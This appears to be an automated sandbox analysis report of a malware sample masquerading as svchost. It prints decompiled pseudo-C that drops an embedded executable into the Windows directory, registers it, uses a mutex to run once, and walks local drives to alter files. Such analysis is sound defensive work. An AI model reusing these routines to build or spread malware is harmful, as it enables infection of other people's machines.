                                                                            • Part of subcall function 00401788: LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                            • Part of subcall function 00401788: RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401FF0), ref: 00401EBF
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401FF7), ref: 00401FEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                          • String ID: `W
                                                                          • API String ID: 2227675388-2472242476
                                                                          • Opcode ID: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                          • Instruction ID: c8d1828e50afdd1ef66478082c2fc5af823077db28515af4f228c2db3bc24797
                                                                          • Opcode Fuzzy Hash: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                          • Instruction Fuzzy Hash: 8A419BB2A043029FD714CF69DE81A2AB7B0FB59318B18827FD441E72F1D739A8518A49
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          control_flow_graph 351 406b48-406b72 352 406b74-406b7c 351->352 353 406bbc-406be9 call 405968 call 403b24 351->353 355 406b7f-406b85 352->355 367 406c26-406c36 call 403970 call 406638 353->367 368 406beb-406bf3 353->368 357 406c7b-406c96 call 403b30 355->357 358 406b8b-406b94 355->358 361 406bb3-406bba 358->361 362 406b96-406b9a 358->362 361->353 361->355 365 406b9d-406ba7 362->365 365->357 366 406bad-406bb1 365->366 366->361 366->365 374 406c3b-406c3d 367->374 370 406bf6-406c24 GetIconInfo 368->370 370->367 370->370 375 406c4c-406c58 call 403970 374->375 376 406c3f-406c47 call 405990 374->376 375->357 380 406c5a-406c5b 375->380 376->375 381 406c62-406c6d 380->381 382 406c75-406c79 381->382 383 406c6f-406c70 DeleteObject 381->383 382->357 382->381 383->382
                                                                          C-Code - Quality: 89%
                                                                          			E00406B48(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                          				intOrPtr* _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				signed int _v20;
                                                                          				intOrPtr _v24;
                                                                          				char _v28;
                                                                          				struct _ICONINFO _v48;
                                                                          				void* _t65;
                                                                          				void* _t72;
                                                                          				signed int _t81;
                                                                          				intOrPtr* _t82;
                                                                          				intOrPtr* _t85;
                                                                          				void* _t98;
                                                                          				void* _t99;
                                                                          				intOrPtr _t103;
                                                                          				intOrPtr _t104;
                                                                          				signed int _t111;
                                                                          				intOrPtr* _t112;
                                                                          				intOrPtr _t116;
                                                                          				intOrPtr _t117;
                                                                          				void* _t118;
                                                                          				void* _t119;
                                                                          				void* _t120;
                                                                          				void* _t121;
                                                                          				void* _t124;
                                                                          
                                                                          				_v28 = 0;
                                                                          				_v16 = __ecx;
                                                                          				_v12 = __edx;
                                                                          				_v8 = __eax;
                                                                          				_push(_t124);
                                                                          				_push(0x406c97);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t124 + 0xffffffd4;
                                                                          				_t116 = _v12;
                                                                          				if(_t116 < 0) {
                                                                          					L8:
                                                                          					_v24 = E00405968();
                                                                          					_push(_v12 + 1 + _v12 + 1);
                                                                          					E00403B24();
                                                                          					_t117 = _v12;
                                                                          					if(_t117 >= 0) {
                                                                          						_t120 = _t117 + 1;
                                                                          						_v20 = 0;
                                                                          						_t85 = _v8;
                                                                          						do {
                                                                          							GetIconInfo( *( *_t85 + 0x1c),  &_v48);
                                                                          							_t81 = _v20 + _v20;
                                                                          							 *((intOrPtr*)(_v28 + _t81 * 4)) = _v48.hbmColor;
                                                                          							 *((intOrPtr*)(_v28 + 4 + _t81 * 4)) = _v48.hbmMask;
                                                                          							_v20 = _v20 + 1;
                                                                          							_t85 = _t85 + 4;
                                                                          							_t120 = _t120 - 1;
                                                                          						} while (_t120 != 0);
                                                                          					}
                                                                          					_t65 = E00406638(_v28, _v16, E00403970()); // executed
                                                                          					if(_t65 == 0) {
                                                                          						E00405990(_v16);
                                                                          					}
                                                                          					_t118 = E00403970();
                                                                          					if(_t118 >= 0) {
                                                                          						_t119 = _t118 + 1;
                                                                          						_v20 = 0;
                                                                          						do {
                                                                          							_t72 =  *(_v28 + _v20 * 4);
                                                                          							if(_t72 != 0) {
                                                                          								DeleteObject(_t72);
                                                                          							}
                                                                          							_v20 = _v20 + 1;
                                                                          							_t119 = _t119 - 1;
                                                                          						} while (_t119 != 0);
                                                                          					}
                                                                          				} else {
                                                                          					_t121 = _t116 + 1;
                                                                          					_v20 = 0;
                                                                          					_t82 = _v8;
                                                                          					while( *((intOrPtr*)( *_t82 + 0x1c)) != 0) {
                                                                          						_t111 = _v20 + 1;
                                                                          						_t98 = _v12 - _t111;
                                                                          						if(_t98 < 0) {
                                                                          							L7:
                                                                          							_v20 = _v20 + 1;
                                                                          							_t82 = _t82 + 4;
                                                                          							_t121 = _t121 - 1;
                                                                          							if(_t121 != 0) {
                                                                          								continue;
                                                                          							} else {
                                                                          								goto L8;
                                                                          							}
                                                                          						} else {
                                                                          							_t99 = _t98 + 1;
                                                                          							_t112 = _v8 + _t111 * 4;
                                                                          							while( *((intOrPtr*)( *_t82 + 0x18)) !=  *((intOrPtr*)( *_t112 + 0x18))) {
                                                                          								_t112 = _t112 + 4;
                                                                          								_t99 = _t99 - 1;
                                                                          								if(_t99 != 0) {
                                                                          									continue;
                                                                          								} else {
                                                                          									goto L7;
                                                                          								}
                                                                          								goto L18;
                                                                          							}
                                                                          						}
                                                                          						goto L18;
                                                                          					}
                                                                          				}
                                                                          				L18:
                                                                          				_pop(_t103);
                                                                          				 *[fs:eax] = _t103;
                                                                          				_push(E00406C9E);
                                                                          				_t104 =  *0x406b28; // 0x406b2c
                                                                          				return E00403B30( &_v28, _t104);
                                                                          			}

                                                                          0x00406b53
                                                                          0x00406b56
                                                                          0x00406b59
                                                                          0x00406b5c
                                                                          0x00406b61
                                                                          0x00406b62
                                                                          0x00406b67
                                                                          0x00406b6a
                                                                          0x00406b6d
                                                                          0x00406b72
                                                                          0x00406bbc
                                                                          0x00406bc4
                                                                          0x00406bcd
                                                                          0x00406bdc
                                                                          0x00406be4
                                                                          0x00406be9
                                                                          0x00406beb
                                                                          0x00406bec
                                                                          0x00406bf3
                                                                          0x00406bf6
                                                                          0x00406c00
                                                                          0x00406c08
                                                                          0x00406c10
                                                                          0x00406c19
                                                                          0x00406c1d
                                                                          0x00406c20
                                                                          0x00406c23
                                                                          0x00406c23
                                                                          0x00406bf6
                                                                          0x00406c36
                                                                          0x00406c3d
                                                                          0x00406c47
                                                                          0x00406c47
                                                                          0x00406c54
                                                                          0x00406c58
                                                                          0x00406c5a
                                                                          0x00406c5b
                                                                          0x00406c62
                                                                          0x00406c68
                                                                          0x00406c6d
                                                                          0x00406c70
                                                                          0x00406c70
                                                                          0x00406c75
                                                                          0x00406c78
                                                                          0x00406c78
                                                                          0x00406c62
                                                                          0x00406b74
                                                                          0x00406b74
                                                                          0x00406b75
                                                                          0x00406b7c
                                                                          0x00406b7f
                                                                          0x00406b8e
                                                                          0x00406b92
                                                                          0x00406b94
                                                                          0x00406bb3
                                                                          0x00406bb3
                                                                          0x00406bb6
                                                                          0x00406bb9
                                                                          0x00406bba
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406b96
                                                                          0x00406b96
                                                                          0x00406b9a
                                                                          0x00406b9d
                                                                          0x00406bad
                                                                          0x00406bb0
                                                                          0x00406bb1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406bb1
                                                                          0x00406b9d
                                                                          0x00000000
                                                                          0x00406b94
                                                                          0x00406b7f
                                                                          0x00406c7b
                                                                          0x00406c7d
                                                                          0x00406c80
                                                                          0x00406c83
                                                                          0x00406c8b
                                                                          0x00406c96

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteIconInfoObject
                                                                          • String ID: ,k@
                                                                          • API String ID: 2689914137-1053005162
                                                                          • Opcode ID: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                          • Instruction ID: dacdd831d29519e08e7e99a77df17fc26ef5cc856f0b9114ccf97923e4886ce8
                                                                          • Opcode Fuzzy Hash: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                          • Instruction Fuzzy Hash: 9F413AB0E0021A9FDB14DF99C881AAEBBB4FF48314F11407AD942B7391D734AE51CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 51%
                                                                          			E004079A0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				char _v24;
                                                                          				char _v28;
                                                                          				void* _t31;
                                                                          				void* _t59;
                                                                          				intOrPtr _t73;
                                                                          				void* _t82;
                                                                          				void* _t83;
                                                                          				intOrPtr _t86;
                                                                          
                                                                          				_t83 = __esi;
                                                                          				_t82 = __edi;
                                                                          				_t54 = __ebx;
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(__ebx);
                                                                          				_push(_t86);
                                                                          				_push(0x407ac4);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t86;
                                                                          				E00407080(0x4091e0, 0xb, 0xb);
                                                                          				E004031F4( &_v12, 0xb, 0x4091e0);
                                                                          				_push(_v12);
                                                                          				E00404F90( &_v16, __ebx, 0xb);
                                                                          				_pop(_t59);
                                                                          				E00403258( &_v8, _t59, _v16);
                                                                          				if(E00404B9C() != 0) {
                                                                          					DeleteFileA(E0040340C(_v8)); // executed
                                                                          				}
                                                                          				_t31 = E00404BF8(E0040340C(_v8), _t54, 0xa200, 0x40a698, _t82, _t83); // executed
                                                                          				if(_t31 != 0) {
                                                                          					E00407080(0x4091ec, 0x1a, 0x1a);
                                                                          					E004031F4( &_v20, 0x1a, 0x4091ec);
                                                                          					_t55 = E0040575C(0x80000000, 0x1a, _v20);
                                                                          					E00407080(0x409208, 8, 8);
                                                                          					E004031F4( &_v28, 8, 0x409208);
                                                                          					E00403258( &_v24, _v28, _v8);
                                                                          					E0040578C(_t40, _v24, 0);
                                                                          					E004057CC(_t55);
                                                                          				}
                                                                          				_pop(_t73);
                                                                          				 *[fs:eax] = _t73;
                                                                          				_push(E00407ACB);
                                                                          				return E004030B8( &_v28, 6);
                                                                          			}


                                                                          APIs
                                                                            • Part of subcall function 00404F90: GetWindowsDirectoryA.KERNEL32(?,00000105,00000000,00404FFA,?,?,?,00407EB6,00000000,00408020,?,?,00000000,00000000,?,0040819C), ref: 00404FBE
                                                                            • Part of subcall function 00404B9C: GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00407AC4,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00408200,00000000,00408220), ref: 00407A0D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$AttributesDeleteDirectoryWindows
                                                                          • String ID: MZP
                                                                          • API String ID: 3550186980-2889622443
                                                                          • Opcode ID: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                          • Instruction ID: 69b580403c23d9cc841dfa7c227de2d2e2536c961132663fd28ad6461d03daee
                                                                          • Opcode Fuzzy Hash: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                          • Instruction Fuzzy Hash: 91212F70B04109ABDB04FAA5C85279F7B69EB85304F50847EA501BB3C2DF3CEE05976A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph: block 452 (404bc4-404bd7, ReadFile); block 453 (404bd9); block 454 (404bdb-404bdc); edges 452->453, 452->454, 453->454
                                                                          C-Code - Quality: 100%
                                                                          			E00404BC4(void* __eax, long __ecx, void* __edx) {
                                                                          				int _t2;
                                                                          				void* _t3;
                                                                          				DWORD* _t8;
                                                                          
                                                                          				_t2 = ReadFile(__eax, __edx, __ecx, _t8, 0); // executed
                                                                          				_t3 = 0;
                                                                          				if(_t2 == 0) {
                                                                          					return 0;
                                                                          				}
                                                                          				return _t3;
                                                                          			}


                                                                          APIs
                                                                          • ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: MZP
                                                                          • API String ID: 2738559852-2889622443
                                                                          • Opcode ID: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                          • Instruction ID: 3ae4d4c2ce5489376b9a0e409b07906e0c93d400668ceedc4e43a286d92feaa2
                                                                          • Opcode Fuzzy Hash: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                          • Instruction Fuzzy Hash: DEC04CA12582083AF51061A29C16F23355CC781799F12456AB704E51D1F096F81000A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph: block 455 (404be0-404bf2, WriteFile); block 456 (404bf4); block 457 (404bf6-404bf7); edges 455->456, 455->457, 456->457
                                                                          C-Code - Quality: 100%
                                                                          			E00404BE0(void* __eax, long __ecx, void* __edx) {
                                                                          				int _t2;
                                                                          				void* _t3;
                                                                          				void* _t7;
                                                                          				DWORD* _t9;
                                                                          
                                                                          				_t2 = WriteFile(__eax, __edx, __ecx, _t9, 0); // executed
                                                                          				_t3 = _t7;
                                                                          				if(_t2 == 0) {
                                                                          					return 0;
                                                                          				}
                                                                          				return _t3;
                                                                          			}


                                                                          APIs
                                                                          • WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID: MZP
                                                                          • API String ID: 3934441357-2889622443
                                                                          • Opcode ID: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                          • Instruction ID: cd8d274a544879f86d75f83ceab2a9824fbef203ff2d66308718860d554d7d3d
                                                                          • Opcode Fuzzy Hash: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                          • Instruction Fuzzy Hash: 4EC04CA11582083AF51051A7AC06F233A5CC781698F114436BB08E1581F456F8011079
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 72%
                                                                          			E00407BD4(void* __eax, void* __ebx, void* __esi) {
                                                                          				void* _v8;
                                                                          				signed int _v12;
                                                                          				intOrPtr _v16;
                                                                          				char _v20;
                                                                          				char _v40258;
                                                                          				char _v41492;
                                                                          				char _v41496;
                                                                          				void* _t35;
                                                                          				void* _t53;
                                                                          				void* _t58;
                                                                          				CHAR* _t88;
                                                                          				intOrPtr _t101;
                                                                          				intOrPtr _t111;
                                                                          				void* _t114;
                                                                          				void* _t115;
                                                                          				intOrPtr _t116;
                                                                          
                                                                          				_t87 = __ebx;
                                                                          				_t114 = _t115;
                                                                          				_push(__eax);
                                                                          				_t35 = 0xa;
                                                                          				do {
                                                                          					_t115 = _t115 + 0xfffff004;
                                                                          					_push(_t35);
                                                                          					_t35 = _t35 - 1;
                                                                          					_t117 = _t35;
                                                                          				} while (_t35 != 0);
                                                                          				_t116 = _t115 + 0xfffffdf0;
                                                                          				_push(__ebx);
                                                                          				_v41496 = 0;
                                                                          				E004033FC(_v8);
                                                                          				_push(_t114);
                                                                          				_push(0x407d8d);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t116;
                                                                          				E004031F4( &_v41496, 3, 0x4091c0);
                                                                          				_t100 = _v41496;
                                                                          				if(E00406FE4(_v8, __ebx, _v41496, _t117) == 0) {
                                                                          					L10:
                                                                          					__eflags = 0;
                                                                          					_pop(_t101);
                                                                          					 *[fs:eax] = _t101;
                                                                          					_push(E00407D94);
                                                                          					E00403094( &_v41496);
                                                                          					return E00403094( &_v8);
                                                                          				} else {
                                                                          					_t53 = E0040258C( *_v8) + 0xbf - 2;
                                                                          					if(_t53 < 0) {
                                                                          						goto L10;
                                                                          					} else {
                                                                          						_t120 = _t53 == 0x19;
                                                                          						if(_t53 == 0x19) {
                                                                          							goto L10;
                                                                          						} else {
                                                                          							E00407AD0(_v8, _t87, __esi, _t120); // executed
                                                                          							_t58 = E00407130(_v8, _t87); // executed
                                                                          							if(_t58 == 0) {
                                                                          								goto L10;
                                                                          							} else {
                                                                          								_t88 = E0040340C(_v8);
                                                                          								_v12 = GetFileAttributesA(_t88);
                                                                          								_t122 = _v12 & 0x00000001;
                                                                          								if((_v12 & 0x00000001) > 0) {
                                                                          									SetFileAttributesA(_t88, 0);
                                                                          								}
                                                                          								_v16 = E00405B84(_v8, _t100, _t122);
                                                                          								_push(_t114);
                                                                          								_push(0x407d4a);
                                                                          								_push( *[fs:eax]);
                                                                          								 *[fs:eax] = _t116;
                                                                          								E0040597C(_v16);
                                                                          								E00405974();
                                                                          								E00405988(_v16);
                                                                          								E0040254C( &_v40258, 4,  &_v20);
                                                                          								E00407080( &_v41492, _v20, 0x3e8);
                                                                          								E00405974();
                                                                          								E0040598C(_v16);
                                                                          								E0040597C(_v16);
                                                                          								E00405980(_v16);
                                                                          								_pop(_t111);
                                                                          								 *[fs:eax] = _t111;
                                                                          								_push(E00407D51);
                                                                          								return E00404520(_v16);
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          			}

                                                                          0x00407cb1
                                                                          0x00407cc1
                                                                          0x00407cd4
                                                                          0x00407ce7
                                                                          0x00407cfa
                                                                          0x00407d04
                                                                          0x00407d17
                                                                          0x00407d1f
                                                                          0x00407d2f
                                                                          0x00407d36
                                                                          0x00407d39
                                                                          0x00407d3c
                                                                          0x00407d49
                                                                          0x00407d49
                                                                          0x00407c6b
                                                                          0x00407c53
                                                                          0x00407c4b

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00407D8D), ref: 00407C7C
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 00407C90
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: b5eb93d17ee822dbc2cfe60c370f870a49ec75f8fbc2fd949dadd44c38c3286c
                                                                          • Instruction ID: 984d91ffacc30f0f747519396fe1a4ca6018efb205f81ccdb5163335beaf5ee0
                                                                          • Opcode Fuzzy Hash: b5eb93d17ee822dbc2cfe60c370f870a49ec75f8fbc2fd949dadd44c38c3286c
                                                                          • Instruction Fuzzy Hash: C6417170E046089FDB10EB69CD929AEB7B5EF45304F1044B7F414B73D2DA39AE058E5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 61%
                                                                          			E0040759C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				void* _t11;
                                                                          				void* _t17;
                                                                          				void* _t32;
                                                                          				intOrPtr _t38;
                                                                          				void* _t44;
                                                                          				void* _t46;
                                                                          				intOrPtr _t49;
                                                                          
                                                                          				_t56 = __fp0;
                                                                          				_t45 = __esi;
                                                                          				_t48 = _t49;
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(__ebx);
                                                                          				_push(__esi);
                                                                          				_push(__edi);
                                                                          				_push(_t49);
                                                                          				_push(0x40765c);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t49; // executed
                                                                          				_t11 = E00406E94(__ebx, __ecx, __edi, __esi, __eflags, __fp0); // executed
                                                                          				if(_t11 != 0) {
                                                                          					_t40 = 0x14;
                                                                          					E00407080(0x4091c8, 0x14, 0x14);
                                                                          					_t17 = E00404018(0, 0, 0x4091c8); // executed
                                                                          					_t44 = _t17;
                                                                          					if(GetLastError() != 0xb7) {
                                                                          						E00406D40( &_v8, __ebx, _t44, __esi); // executed
                                                                          						_t32 = E0040320C(_v8);
                                                                          						_t53 = _t32;
                                                                          						if(_t32 > 0) {
                                                                          							_t46 = 1;
                                                                          							do {
                                                                          								E004031B4();
                                                                          								_t40 = 0x407674;
                                                                          								E00403214( &_v12, 0x407674);
                                                                          								E004074B4(_v12, _t32, _t44, _t46, _t53, _t48); // executed
                                                                          								_pop(0x14);
                                                                          								_t46 = _t46 + 1;
                                                                          								_t32 = _t32 - 1;
                                                                          								_t54 = _t32;
                                                                          							} while (_t32 != 0);
                                                                          						}
                                                                          						E00406E0C(_t32, 0x14, _t40, _t44, _t45, _t54, _t56);
                                                                          						ReleaseMutex(_t44);
                                                                          					}
                                                                          				}
                                                                          				_pop(_t38);
                                                                          				 *[fs:eax] = _t38;
                                                                          				_push(E00407663);
                                                                          				return E004030B8( &_v12, 2);
                                                                          			}

                                                                          APIs
                                                                            • Part of subcall function 00404018: CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                          • GetLastError.KERNEL32(00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 004075E5
                                                                            • Part of subcall function 00406D40: GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                          • ReleaseMutex.KERNEL32(00000000,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 0040763C
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Mutex$CreateDriveErrorLastLogicalReleaseStrings
                                                                          • String ID:
                                                                          • API String ID: 676290295-0
                                                                          • Opcode ID: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                          • Instruction ID: a50fa674edadcb4b051b0a96f5935ee5b8f91fbc0aee7086ed6abe5ddad9c237
                                                                          • Opcode Fuzzy Hash: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                          • Instruction Fuzzy Hash: A2110A306446086BD710BBA6CC42B5E7B6CCB81714F5004BBFA017B3C3CA3DAD04816E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 538 406d40-406d77 GetLogicalDriveStringsA 539 406dd5-406de1 538->539 540 406de3-406dfb call 403094 539->540 541 406d79-406d91 GetDriveTypeA 539->541 542 406dd2 541->542 543 406d93-406da1 call 40258c 541->543 542->539 543->542 549 406da3-406db1 call 40258c 543->549 549->542 552 406db3-406dcd call 4031b4 call 403214 549->552 552->542
                                                                          C-Code - Quality: 68%
                                                                          			E00406D40(void* __eax, void* __ebx, void* __edi, void* __esi, char _a12245929) {
                                                                          				char _v155;
                                                                          				char _v160;
                                                                          				int _t23;
                                                                          				signed int _t37;
                                                                          				intOrPtr _t41;
                                                                          				void* _t45;
                                                                          				void* _t50;
                                                                          				void* _t51;
                                                                          
                                                                          				_t50 = _t51;
                                                                          				_v160 = 0;
                                                                          				_t45 = __eax;
                                                                          				_push(_t50);
                                                                          				_push(0x406dfc);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t51 + 0xffffff64;
                                                                          				GetLogicalDriveStringsA(0x97,  &_v155); // executed
                                                                          				_t37 = 0;
                                                                          				while(_a12245929 != 0) {
                                                                          					_t48 = _t37 & 0x000000ff;
                                                                          					_t23 = GetDriveTypeA(_t50 + (_t37 & 0x000000ff) - 0x97); // executed
                                                                          					if(_t23 != 5 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x41 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x42) {
                                                                          						E004031B4();
                                                                          						E00403214(_t45, _v160);
                                                                          					}
                                                                          					_t37 = _t37 + 4;
                                                                          				}
                                                                          				_pop(_t41);
                                                                          				 *[fs:eax] = _t41;
                                                                          				_push(E00406E03);
                                                                          				return E00403094( &_v160);
                                                                          			}

                                                                          APIs
                                                                          • GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                          • GetDriveTypeA.KERNEL32(00000000), ref: 00406D89
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Drive$LogicalStringsType
                                                                          • String ID:
                                                                          • API String ID: 1630765265-0
                                                                          • Opcode ID: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                          • Instruction ID: e1e1b0806745e30ff5eb453561950d2c3ef676df74625b4c39c06a75345551cd
